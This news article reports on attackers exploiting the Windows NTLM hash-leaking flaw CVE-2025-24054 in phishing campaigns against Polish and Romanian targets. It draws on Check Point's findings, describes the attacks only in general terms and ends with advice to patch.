On March 11 – Patch Tuesday – Microsoft rolled out its usual buffet of bug fixes. Just eight days later, miscreants had weaponized one of the vulnerabilities, using it against government and private sector targets in Poland and Romania.

The Windows flaw in question was CVE-2025-24054, an NTLM hash-leaking vulnerability that Microsoft rated as “less likely” to be exploited. Attackers begged to differ and built malware that abused the bug, according to researchers at Check Point.

Specifically, the vulnerability can be exploited to leak a victim’s Net-NTLMv2 or NTLMv2-SSP hash over the network. According to Check Point, miscreants can “attempt to brute-force the hash offline or perform relay attacks,” and impersonate the user to access stuff and perform actions as them.

In the initial wave of attacks, phishing emails lured victims to download a Dropbox-hosted ZIP archive called xd.zip. Inside were four booby-trapped files, including a .library-ms file that exploited CVE-2025-24054. Simply unzipping the archive – or in some cases, just viewing the folder in Windows Explorer – was enough to trigger an outbound SMB authentication attempt, leaking the victim’s Net-NTLMv2 hash to a remote server controlled by the attackers.

The Check Point researchers observed that stolen NTLM hashes were exfiltrated to a specific IP address: 159.196.128[.]120 – an address previously flagged by HarfangLab in January as linked to APT28, aka the Russia-backed Fancy Bear hacking group. However, there’s no further information directly associating this IP with the group, the security shop notes.

By March 25, attackers were no longer relying solely on open ZIP archives and had begun emailing standalone .library-ms files directly to targets. According to Microsoft, this exploit can be triggered with minimal user interaction, such as selecting (single-clicking) or inspecting (right-clicking) the file.

That malware campaign quickly went international, with around 10 separate campaigns observed by March 25, all aimed at harvesting NTLMv2 hashes. The stolen credentials were sent to attacker-controlled SMB servers located in Russia, Bulgaria, the Netherlands, Australia, and Turkey.

“This rapid exploitation highlights the critical need for organizations to apply patches immediately and ensure that NTLM vulnerabilities are addressed in their environments,” Check Point reported.

“The minimal user interaction required for the exploit to trigger and the ease with which attackers can gain access to NTLM hashes make it a significant threat, especially when such hashes can be used in pass-the-hash attacks.” ®